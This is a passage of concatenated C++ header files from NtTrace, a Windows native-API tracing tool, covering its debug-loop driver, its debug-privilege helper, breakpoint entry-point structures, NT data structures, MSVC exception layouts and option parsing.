IN DWORD ProcessId, 392 | IN HANDLE hFile, 393 | IN MINIDUMP_TYPE DumpType, 394 | IN CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, OPTIONAL 395 | IN CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, OPTIONAL 396 | IN CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam OPTIONAL 397 | ); 398 | 399 | DYN_LOAD( MiniDumpWriteDump ); 400 | 401 | BOOL bRet = FALSE; 402 | 403 | if ( pfnMiniDumpWriteDump ) 404 | { 405 | bRet = pfnMiniDumpWriteDump( m_hProcess, processId, hFile, DumpType, 406 | ExceptionParam, UserStreamParam, CallbackParam ); 407 | } 408 | return bRet; 409 | } 410 | 411 | #undef DYM_LOAD 412 | 413 | /** Test whether EnumSymbols API is available */ 414 | inline 415 | BOOL DbgHelper::IsEnumSymbolsAvailable() const 416 | { 417 | // Run a test which won't produce any callbacks 418 | return EnumSymbols( 0, 0, 0, 0 ); 419 | } 420 | 421 | #endif // DBGHELP_6_1_APIS 422 | 423 | } 424 | 425 | #endif // DBGHELPER_INL_ 426 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DebugDriver.h: -------------------------------------------------------------------------------- 1 | #ifndef DEBUGDRIVER_H_ 2 | #define DEBUGDRIVER_H_ 3 | 4 | /** 5 | @file 6 | Simple base class for running the debug loop. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002,2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: DebugDriver.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #ifndef _WINDOWS_ 30 | #include 31 | #endif // _WINDOWS_ 32 | 33 | #include 34 | 35 | namespace or2 36 | { 37 | 38 | ////////////////////////////////////////////////////////////////////////// 39 | /** 40 | * Base interface class for writing a debugger. 41 | * 42 | * This class provides the callbacks for the DebugDriver class. 43 | */ 44 | class Debugger 45 | { 46 | public: 47 | // callbacks on events 48 | /** Exception occurred */ 49 | virtual void OnException( HANDLE hProcess, HANDLE hThread, DWORD pid, DWORD tid, EXCEPTION_DEBUG_INFO const & DebugEvent, DWORD * pContinueExecution ) = 0; 50 | 51 | /** Callback on thread creation */ 52 | virtual void OnCreateThread( DWORD dwThreadId, CREATE_THREAD_DEBUG_INFO const & CreateThread ) = 0; 53 | 54 | /** Callback on process creation */ 55 | virtual void OnCreateProcess( DWORD dwProcessId, DWORD dwThreadId, CREATE_PROCESS_DEBUG_INFO const & CreateProcessInfo ) = 0; 56 | 57 | /** Callback on thread exit */ 58 | virtual void OnExitThread( DWORD dwThreadId, EXIT_THREAD_DEBUG_INFO const & ExitThread ) = 0; 59 | 60 | /** Callback on process exit */ 61 | virtual void OnExitProcess( DWORD dwProcessId, EXIT_PROCESS_DEBUG_INFO const & ExitProcess ) = 0; 62 | 63 | /** Callback on loading DLL */ 64 | virtual void OnLoadDll( HANDLE hProcess, LOAD_DLL_DEBUG_INFO const & LoadDll ) = 0; 65 | 66 | /** Callback on unloading DLL */ 67 | virtual void OnUnloadDll( UNLOAD_DLL_DEBUG_INFO const & UnloadDll ) = 0; 68 | 69 | /** Callback on outputting a debug string */ 70 | virtual void OnOutputDebugString( HANDLE hProcess, OUTPUT_DEBUG_STRING_INFO const & DebugString ) = 0; 71 | 72 | /** Is the debugger still active? */ 73 | virtual bool Active() { return true; } 74 | 75 | /** Virtual dtor for safe inheritance */ 76 | virtual ~Debugger() {} 77 | }; 78 | 79 | ////////////////////////////////////////////////////////////////////////// 80 | /** 81 | * Adapter for stripped-down functionality of a Debugger 82 | */ 83 | class DebuggerAdapter : public Debugger 84 | { 85 | #pragma warning( push ) 86 | #pragma warning( disable: 4100 ) // unreferenced formal parameter 87 | 88 | public: 89 | // callbacks on events 90 | /** Exception occurred */ 91 | virtual void OnException( HANDLE hProcess, HANDLE hThread, DWORD pid, DWORD tid, EXCEPTION_DEBUG_INFO const & DebugEvent, DWORD * pContinueExecution ) {} 92 | 93 | /** Callback on thread creation */ 94 | virtual void OnCreateThread( DWORD dwThreadId, CREATE_THREAD_DEBUG_INFO const & CreateThread ) {} 95 | 96 | /** Callback on process creation */ 97 | virtual void OnCreateProcess( DWORD dwProcessId, DWORD dwThreadId, CREATE_PROCESS_DEBUG_INFO const & CreateProcessInfo ) {} 98 | 99 | /** Callback on thread exit */ 100 | virtual void OnExitThread( DWORD dwThreadId, EXIT_THREAD_DEBUG_INFO const & ExitThread ) {} 101 | 102 | /** Callback on process exit */ 103 | virtual void OnExitProcess( DWORD dwProcessId, EXIT_PROCESS_DEBUG_INFO const & ExitProcess ) {} 104 | 105 | /** Callback on loading DLL */ 106 | virtual void OnLoadDll( HANDLE hProcess, LOAD_DLL_DEBUG_INFO const & LoadDll ) {} 107 | 108 | /** Callback on unloading DLL */ 109 | virtual void OnUnloadDll( UNLOAD_DLL_DEBUG_INFO const & UnloadDll ) {} 110 | 111 | /** Callback on outputting a debug string */ 112 | virtual void OnOutputDebugString( HANDLE hProcess, OUTPUT_DEBUG_STRING_INFO const & DebugString ) {} 113 | 114 | #pragma warning( pop ) 115 | }; 116 | 117 | ////////////////////////////////////////////////////////////////////////// 118 | /** 119 | * Simple class for running the debug loop. 120 | * 121 | * The DebugDriver class runs the debug loop until the debugee has finished. 122 | * Events are signified by callbacks to the supplied Debugger object 123 | */ 124 | class DebugDriver 125 | { 126 | public: 127 | /** Runs till debugee finishes, calling back 'debugger' for each event */ 128 | void Loop( Debugger & debugger ); 129 | 130 | private: 131 | ////////////////////////////////////////////////////////////////////////// 132 | // Data structure used for handling thread/process id -> handle mapping 133 | typedef std::map< DWORD, HANDLE > ThreadMap; 134 | struct ProcessEntry 135 | { 136 | ProcessEntry() : attached( false ) {} 137 | bool attached; 138 | HANDLE hProcess; 139 | ThreadMap threadMap; 140 | }; 141 | typedef std::map< DWORD, ProcessEntry > ProcessMap; 142 | 143 | private: 144 | ProcessMap processMap; 145 | }; 146 | 147 | } // namespace 148 | 149 | #endif // DEBUGDRIVER_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/DebugPriv.h: -------------------------------------------------------------------------------- 1 | #ifndef DEBUG_PRIV_H_ 2 | #define DEBUG_PRIV_H_ 3 | 4 | /** 5 | @file 6 | Function to grant debug privileges to a process. 7 | 8 | Granting debug privileges enables being able to access other processes 9 | to read/write memory and debug them. 10 | 11 | @author Roger Orr 12 | 13 | Copyright © 2003. 14 | This software is distributed in the hope that it will be useful, but 15 | without WITHOUT ANY WARRANTY; without even the implied warranty of 16 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 17 | 18 | Permission is granted to anyone to make or distribute verbatim 19 | copies of this software provided that the copyright notice and 20 | this permission notice are preserved, and that the distributor 21 | grants the recipient permission for further distribution as permitted 22 | by this notice. 23 | 24 | Comments and suggestions are always welcome. 25 | Please report bugs to rogero@howzatt.demon.co.uk. 26 | 27 | $Revision: 1405 $ 28 | */ 29 | 30 | // $Id: DebugPriv.h 1405 2013-11-12 23:57:17Z Roger $ 31 | 32 | #include "AdjustPriv.h" 33 | 34 | namespace or2 35 | { 36 | 37 | /** 38 | * Changes the process's privilege so that kill works properly. 39 | * 40 | * @return 41 | * - TRUE - success 42 | * - FALSE - failure 43 | */ 44 | BOOL 45 | inline 46 | EnableDebugPriv( 47 | HANDLE hProcess = GetCurrentProcess() ///< handle of the process to which to give debug privilege 48 | ) 49 | { 50 | return EnableNamedPriv( SE_DEBUG_NAME, hProcess ); 51 | } 52 | 53 | } 54 | 55 | #endif // DEBUG_PRIV_H_ 56 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/EntryPoint.h: -------------------------------------------------------------------------------- 1 | #ifndef ENTRYPOINT_H_ 2 | #define ENTRYPOINT_H_ 3 | 4 | /** 5 | @file 6 | Manage a single entry point for NtTrace. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002,2007. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1439 $ 25 | */ 26 | 27 | // $Id: EntryPoint.h 1439 2014-10-07 23:24:07Z Roger $ 28 | 29 | #include 30 | 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | 37 | ////////////////////////////////////////////////////////////////////////// 38 | // Forward Reference 39 | struct NtCall; 40 | 41 | ////////////////////////////////////////////////////////////////////////// 42 | // Possible distinct argument types 43 | typedef enum 44 | { 45 | argULONG_PTR = 0, // also the default 46 | argULONG, 47 | argULONGLONG, // two adjacent dwords in 32bit, one qword in 64bit 48 | argENUM, 49 | argMASK, 50 | argBOOLEAN, 51 | argPOINTER, 52 | argPOBJECT_ATTRIBUTES, 53 | argPUNICODE_STRING, 54 | argPHANDLE, 55 | argPUSHORT, 56 | argPULONG, 57 | argACCESS_MASK, 58 | argPCLIENT_ID, 59 | argPIO_STATUS_BLOCK, 60 | argPLARGE_INTEGER, 61 | argPLPC_MESSAGE, 62 | argPFILE_BASIC_INFORMATION, 63 | argPFILE_NETWORK_OPEN_INFORMATION 64 | } ArgType; 65 | 66 | typedef enum ArgAttributes 67 | { 68 | argNONE = 0, 69 | argIN = 1, 70 | argOUT = 2, 71 | argOPTIONAL = 4, 72 | argCONST = 8 73 | }; 74 | 75 | struct Argument 76 | { 77 | Argument() : argType( argULONG_PTR ), argTypeName( "ULONG" ), name( "Unknown" ), attributes( argNONE ) {} 78 | Argument( ArgType argType, std::string const &argTypeName, std::string const &name, ArgAttributes attributes ) 79 | : argType( argType ), argTypeName( argTypeName ), name( name ), attributes( attributes ), dummy(false) 80 | {} 81 | 82 | #ifdef _M_IX86 83 | typedef DWORD ARG; 84 | #elif _M_X64 85 | typedef DWORD64 ARG; 86 | #endif 87 | 88 | /** Show the argument for the given process with the specified value. */ 89 | void showArgument(std::ostream & os, HANDLE hProcess, ARG value, bool returnOk, bool dup) const; 90 | 91 | /** true if argument is output-only */ 92 | bool outputOnly() const; 93 | 94 | ArgType argType; // Argument type for processing 95 | std::string argTypeName; // Actual argument type 96 | std::string name; // formal name of argument 97 | ArgAttributes attributes; // Optional attributes 98 | bool dummy; // True if this is a dummy argument (2nd part of 64bit item on 32bit Windows) 99 | }; 100 | 101 | typedef enum 102 | { 103 | retNTSTATUS = 0, // also the default 104 | retVOID, 105 | retPVOID, 106 | retULONG, 107 | retULONG_PTR, 108 | } ReturnType; 109 | 110 | class EntryPoint 111 | { 112 | public: 113 | typedef std::map Typedefs; 114 | 115 | explicit EntryPoint( std::string const & name, std::string const & category ) : name( name ), category( category ), disabled(category[0] == '-'), targetAddress( 0 ), preSave(0), retType(retNTSTATUS) 116 | { 117 | if (disabled) 118 | { 119 | this->category.erase(0, 1); 120 | } 121 | } 122 | 123 | std::string const & getName() const { return name; } 124 | 125 | std::string const & getCategory() const { return category; } 126 | 127 | bool isDisabled() const { return disabled; } 128 | 129 | size_t getArgumentCount() const { return arguments.size(); } 130 | 131 | void setArgumentCount( size_t newSize ) { arguments.resize( newSize ); } 132 | 133 | Argument const & getArgument( size_t idx ) const { return arguments[ idx ]; } 134 | 135 | void setArgument( int argNum, std::string const & argType, 136 | std::string const & variableName, ArgAttributes attributes, Typedefs const & typedefs ); 137 | 138 | void setDummyArgument(int argNum, ArgAttributes attributes); 139 | 140 | void setReturnType(std::string const &type, Typedefs const & typedefs); 141 | 142 | ReturnType getReturnType() const { return retType; } 143 | 144 | static bool readEntryPoints( std::istream & cfgFile, std::set & entryPoints, Typedefs & typedefs, std::string & target ); 145 | 146 | void writeExport( std::ostream & os ) const; 147 | 148 | /** Set a trap for this entry point in the target process */ 149 | NtCall setNtTrap(HANDLE hProcess, HMODULE hTargetDll, bool bPreTrace, DWORD dllOffset); 150 | 151 | /** Clear the trap for this entry in the target process */ 152 | bool clearNtTrap(HANDLE hProcess, NtCall const & ntcall) const; 153 | 154 | void setAddress( unsigned char *brkptAddress ) { targetAddress = brkptAddress; } 155 | 156 | unsigned char * getAddress() const { return targetAddress; } 157 | 158 | void setPreSave( unsigned char *preSaveAddress ) { preSave = preSaveAddress; } 159 | 160 | unsigned char * getPreSave() const { return preSave; } 161 | 162 | void doPreSave(HANDLE hProcess, HANDLE hThread, CONTEXT const & Context); 163 | 164 | void trace( std::ostream & os, HANDLE hProcess, HANDLE hThread, CONTEXT const & Context, bool bNames, bool bStackTrace, bool before ) const; 165 | 166 | bool operator<( EntryPoint const & rhs ) const; 167 | 168 | static void stackTrace(std::ostream & os, HANDLE hProcess, HANDLE hThread); 169 | private: 170 | std::string name; // name of entry point 171 | std::string category; // category of entry point 172 | bool disabled; // this entry point is disabled 173 | std::vector< Argument > arguments; // vector of arguments 174 | ReturnType retType; // Return type 175 | std::string retTypeName; // full name of return type 176 | unsigned char *targetAddress; 177 | unsigned char *preSave; // address of pre-save (for X64 fast-call) 178 | DWORD ssn; // System Service Number [Used to set Eax/Rax to pre-call breakpoint] 179 | 180 | NtCall insertBrkpt( HANDLE hProcess, unsigned char *address, unsigned int offset, unsigned char *setssn ); 181 | }; 182 | 183 | typedef std::set EntryPointSet; 184 | 185 | ////////////////////////////////////////////////////////////////////////// 186 | // Our data structure for an NT call 187 | struct NtCall 188 | { 189 | NtCall() : entryPoint(0), nArgs(0) {} 190 | 191 | EntryPoint* entryPoint; // Pointer into EntryPointMap 192 | 193 | size_t nArgs; // Number of arguments 194 | 195 | typedef enum 196 | { 197 | trapContinue, 198 | trapReturn, 199 | trapReturn0, 200 | trapJump 201 | } TrapType; 202 | TrapType trapType; 203 | DWORD jumpTarget; // used for trapJump 204 | }; 205 | 206 | #endif // ENTRYPOINT_H_ 207 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/Enumerations.h: -------------------------------------------------------------------------------- 1 | #ifndef ENUMERATIONS_H_ 2 | #define ENUMERATIONS_H_ 3 | 4 | /** 5 | @file 6 | Manage Nt enumerations for NtTrace. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2011. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1460 $ 25 | */ 26 | 27 | // $Id: Enumerations.h 1460 2014-10-09 22:31:44Z Roger $ 28 | 29 | namespace Enumerations 30 | { 31 | /** Provide a single mapping from an enumeration value to a name */ 32 | struct EnumMap 33 | { 34 | unsigned long value; ///< The enumeration value 35 | char const * name; ///< The corresponding name 36 | }; 37 | 38 | /** Provide a mapping from an enumeration name to a zero-terminated array of EnumMap entries */ 39 | struct AllEnum 40 | { 41 | const char *name; ///< The enumeration name 42 | EnumMap *pMap; ///< The corresponding EnumMap 43 | }; 44 | 45 | extern AllEnum allEnums[]; 46 | } 47 | 48 | #endif // ENUMERATIONS_H_ 49 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/GetFileNameFromHandle.h: -------------------------------------------------------------------------------- 1 | #ifndef GetFileNameFromHandle_H_ 2 | #define GetFileNameFromHandle_H_ 3 | 4 | #include 5 | #include 6 | 7 | std::string GetFileNameFromHandle(HANDLE hFile); 8 | 9 | #endif // GetFileNameFromHandle_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/GetModuleBase.h: -------------------------------------------------------------------------------- 1 | #ifndef GETMODULEBASE_H_ 2 | #define GETMODULEBASE_H_ 3 | 4 | /**@file 5 | 6 | Function to provide an implementation of SymGetModuleBase. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: GetModuleBase.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | #ifndef _WINDOWS_ 30 | #include 31 | #endif // _WINDOWS_ 32 | 33 | /** 34 | * GetModuleBase: try to get information about a module being loaded. 35 | * @param hProcess handle to the target process 36 | * @param dwAddress the target address 37 | * @return the base address of the module, or zero if not identified 38 | */ 39 | DWORD64 CALLBACK GetModuleBase( HANDLE hProcess, DWORD64 dwAddress ); 40 | 41 | /** 42 | * Get module file name, correcting for a couple of common issues. 43 | * 44 | * @param hProcess the process to query 45 | * @param hMod the module to query 46 | * @param szBuff the output filename buffer 47 | * @param bufLen the size of the output buffer 48 | * @returns the length of the string copied to the buffer, or zero on failure, 49 | * in which case call GetLastError for the underlying error code. 50 | */ 51 | DWORD GetModuleFileNameWrapper( HANDLE hProcess, HMODULE hMod, char * szBuff, DWORD bufLen ); 52 | 53 | #endif // GETMODULEBASE_H_ 54 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/MsvcExceptions.h: -------------------------------------------------------------------------------- 1 | #ifndef MSVCEXCEPTIONS_H_ 2 | #define MSVCEXCEPTIONS_H_ 3 | 4 | /**@file 5 | 6 | Data for Microsoft Visual Studio exceptions 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2004. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: MsvcExceptions.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | /* Value of ExceptionCode for an MSVC C++ exception ("msc") */ 30 | static DWORD const MSVC_EXCEPTION = 0xe06d7363; 31 | 32 | /* Value of ExceptionCode for an MSVC notification exception (used for 'SetThreadName') */ 33 | static DWORD const MSVC_NOTIFICATION = 0x406d1388; 34 | 35 | /* Value of ExceptionCode for an MS CLR exception ("COM") */ 36 | static DWORD const CLR_EXCEPTION = 0xe0434f4d; 37 | 38 | /* Value of ExceptionCode for an MS CLR 4 exception ("CCR") */ 39 | static DWORD const CLR_EXCEPTION_V4 = 0xe0434352; 40 | 41 | /* Value of ExceptionCode for an MS CLR notification */ 42 | static DWORD const CLR_NOTIFICATION = 0x04242420; 43 | 44 | /** Value of ExceptionInformation[0] for an MSVC C++ exception */ 45 | static DWORD const MSVC_MAGIC_NUMBER1 = 0x19930520; // ' Name taken from EHSUP.INC (!) 46 | 47 | /* 48 | * Data passed about with a thrown object in MSVC. 49 | */ 50 | 51 | // Forward references 52 | struct MsvcClassHeader; 53 | struct MsvcClassInfo; 54 | 55 | /** 56 | * Data associated with a thrown object in MSVC 57 | * 58 | * ExceptionInformation[2] points to one of these, unless it is a no-arg throw 59 | * when the pointer is null. 60 | */ 61 | struct MsvcThrow 62 | { 63 | DWORD unknown1; ///< Use is not known 64 | DWORD pDestructor; ///< Offset to destructor, or null 65 | DWORD unknown2; ///< Use is not known 66 | DWORD pClassHeader; ///< Offset to CTA2PAD (MsvcClassHeader) 67 | }; 68 | 69 | /** Class header for a thrown object in MSVC */ 70 | struct MsvcClassHeader 71 | { 72 | DWORD cInfo; ///< Count of Info structures 73 | DWORD Info[1]; ///< Actually variable size structure (MsvcClassInfo) 74 | }; 75 | 76 | /** Information pointed to by the class header for a thrown object in MSVC */ 77 | struct MsvcClassInfo 78 | { 79 | DWORD unknown1; ///< Flags? seen 0 and 4 80 | DWORD pTypeInfo; ///< Offset to type information (const type_info *) 81 | DWORD unknown2; ///< Usually zero 82 | DWORD unknown3; ///< Usually 0xffffffff, seen 4 83 | DWORD unknown4; ///< Only important if unknown3 != 0xffffffff 84 | DWORD size; ///< Size of object 85 | DWORD copyCtor; ///< Offset to copy constructor 86 | }; 87 | 88 | /* 89 | * Data structures used to implement catch handling and exception unwinding in MSVC 90 | */ 91 | 92 | // Forward references 93 | struct MsvcUnwindEntry; 94 | struct MsvcTryEntry; 95 | struct MsvcCatchEntry; 96 | 97 | /** 98 | * Top level catch handler in MSVC 99 | * 100 | * The compiler-generated Win32 exception handler starts with a mov into eax of 101 | * one of these structures. 102 | */ 103 | struct MsvcFrameHandler 104 | { 105 | DWORD magic; ///< magic number (MSVC_MAGIC_NUMBER1) 106 | DWORD cUnwindEntry; ///< count of unwind entries 107 | MsvcUnwindEntry *pUnwindEntry; ///< unwind entries (indexed by 'current level' in exception record) 108 | DWORD cTryEntry; ///< count of try entries 109 | MsvcTryEntry *pTryEntry; ///< try entries (search in order by current level) 110 | }; 111 | 112 | /** Unwind entry in MSVC */ 113 | struct MsvcUnwindEntry 114 | { 115 | DWORD prev; ///< previous level for unwinding multiple variables 116 | PVOID unwindFunction; ///< function to unwind current variable 117 | }; 118 | 119 | /** Try entry in MSVC */ 120 | struct MsvcTryEntry 121 | { 122 | DWORD startIndex; ///< Level at start of try block 123 | DWORD endIndex; ///< Level at end of try block 124 | DWORD catchIndex; ///< Level after catch statement(s) 125 | DWORD nCatchEntry; ///< Number of catch statements 126 | MsvcCatchEntry *pCatchEntry; ///< Pointer to catch entries 127 | }; 128 | 129 | /** Data for an individual catch handler in MSVC */ 130 | struct MsvcCatchEntry 131 | { 132 | DWORD flags; ///< flags describing sort of catch 133 | DWORD rtti; ///< pointer to RTTI information 134 | DWORD offset; ///< stack offset (?) 135 | PVOID catchHandler; ///< start of catch block 136 | }; 137 | 138 | #endif // MSVCEXCEPTIONS_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/NtDllStruct.h: -------------------------------------------------------------------------------- 1 | #ifndef NtDllStruct_H_ 2 | #define NtDllStruct_H_ 3 | 4 | /**@file 5 | 6 | Header for NtDll Structures - defines some data structures used by the native API. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2004. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: NtDllStruct.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | // For MSVC 5.00/6.00 basetsd.h (changes with platform SDK) 30 | #ifndef _W64 31 | typedef UINT_PTR ULONG_PTR; 32 | typedef ULONG SIZE_T; 33 | #endif 34 | 35 | // Nt services data structures 36 | 37 | /** Status codes returned from the Native API */ 38 | typedef LONG NTSTATUS; 39 | 40 | /** Testing for success */ 41 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 42 | 43 | /** Unicode String used in Native API */ 44 | typedef struct _UNICODE_STRING { 45 | USHORT Length; ///< Length of string in bytes 46 | USHORT MaximumLength; ///< Maximum length of Buffer 47 | PWSTR Buffer; ///< Pointer to Unicode string 48 | } UNICODE_STRING, *PUNICODE_STRING; 49 | 50 | /** Object Attributes used in Native API */ 51 | typedef struct _OBJECT_ATTRIBUTES { 52 | ULONG Length; ///< Length of the structure 53 | HANDLE RootDirectory; ///< Handle to the root object directory or NULL 54 | PUNICODE_STRING ObjectName; ///< Name of the object 55 | ULONG Attributes; ///< Attributes for the object 56 | PVOID SecurityDescriptor; ///< Security descriptor, or NULL 57 | PVOID SecurityQualityOfService; ///< Quality of service 58 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 59 | 60 | /** Client ID used in Native API */ 61 | typedef struct _CLIENT_ID { 62 | HANDLE UniqueProcess; ///< Process ID 63 | HANDLE UniqueThread; ///< Thread ID 64 | } CLIENT_ID, *PCLIENT_ID; 65 | 66 | /** I/O status block used in Native API */ 67 | typedef struct _IO_STATUS_BLOCK { 68 | union { 69 | NTSTATUS Status; ///< NT status value 70 | PVOID Pointer; ///< Pointer 71 | }; 72 | 73 | ULONG_PTR Information; ///< Additional information 74 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 75 | 76 | /** Basic File Information used in Native API */ 77 | typedef struct _FILE_BASIC_INFORMATION { 78 | LARGE_INTEGER CreationTime; ///< Time of creation 79 | LARGE_INTEGER LastAccessTime; ///< Time of last access 80 | LARGE_INTEGER LastWriteTime; ///< Time of last write 81 | LARGE_INTEGER ChangeTime; ///< Time of last change 82 | ULONG FileAttributes; ///< File attributes 83 | } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; 84 | 85 | /** Network Open Information used in Native API */ 86 | typedef struct _FILE_NETWORK_OPEN_INFORMATION { 87 | LARGE_INTEGER CreationTime; ///< Time of creation 88 | LARGE_INTEGER LastAccessTime; ///< Time of last access 89 | LARGE_INTEGER LastWriteTime; ///< Time of last write 90 | LARGE_INTEGER ChangeTime; ///< Time of last change 91 | LARGE_INTEGER AllocationSize; ///< Size of file allocation 92 | LARGE_INTEGER EndOfFile; ///< End of file position 93 | ULONG FileAttributes; ///< File attributes 94 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; 95 | 96 | /** Object returned from NtQueryDirectoryObject */ 97 | typedef struct _OBJECT_DIRECTORY_INFORMATION { 98 | UNICODE_STRING Name; ///< Name of directory object 99 | UNICODE_STRING TypeName; ///< Type of directory object, eg "Section" 100 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 101 | 102 | /** LPC message structure */ 103 | typedef struct _LPC_MESSAGE { 104 | USHORT DataLength; ///< Data length 105 | USHORT Length; ///< Length of message, including this header 106 | USHORT MessageType; ///< LPC_TYPE 107 | USHORT DataInfoOffset; ///< Offset to data information 108 | CLIENT_ID ClientId; ///< Client ID 109 | ULONG_PTR MessageId; ///< Message identifier (incrementing counter) 110 | ULONG_PTR CallbackId; ///< Callback identifier 111 | } LPC_MESSAGE, *PLPC_MESSAGE; 112 | 113 | #endif // NtDllStruct_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/Options.h: -------------------------------------------------------------------------------- 1 | #ifndef OPTIONS_H_ 2 | #define OPTIONS_H_ 3 | 4 | /** 5 | @file 6 | Provide command line option handling. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1428 $ 25 | */ 26 | 27 | // $Id: Options.h 1428 2014-10-04 21:55:56Z Roger $ 28 | 29 | #include 30 | #include 31 | 32 | /** Namespace for general utility classes and functions */ 33 | namespace or2 34 | { 35 | 36 | /** 37 | * Class to handle command line options. 38 | * 39 | * This class is designed to handle simple command lines where a set of options (sometimes called flags) 40 | * precede a list of non-flag arguments. 41 | * 42 | * Options are identified by starting with either '-' or '/', and the option name is one or more characters. 43 | *
44 | * Options can be declared as 'bool', 'int', 'unsigned int', 'long', 'unsigned long', 'double' or 'string'. For all 45 | * types other than 'bool' the value is supplied as the next command line argument. 46 | * 47 | * The number of (non-flag) arguments can be specified either as a single number 48 | * or a range of values, which can be open ended. Once option processing is complete 49 | * the remaining arguments are available using STL iterators obtained from the begin() and end() 50 | * methods. 51 | * 52 | * Three in-built options are supported:
    53 | *
  • -h (or -?) displays syntax help for the command line. 54 | *
  • -ver prints the version string (provided in the constructor - typically an RCS 'Id' string 55 | *
  • -- terminates flag processing and allows non-flag arguments which start with '-' or '/' 56 | *
57 | * 58 | * Example: 59 | *

 60 |  *   Options opt( rcsId );
 61 |  *   opt.set( "b", &boolValue, "batch mode" );
 62 |  *   opt.set( "i", &intValue, "number of repeats" );
 63 |  *   if  (! opt.process( argc, argv, "This program does something" ) )
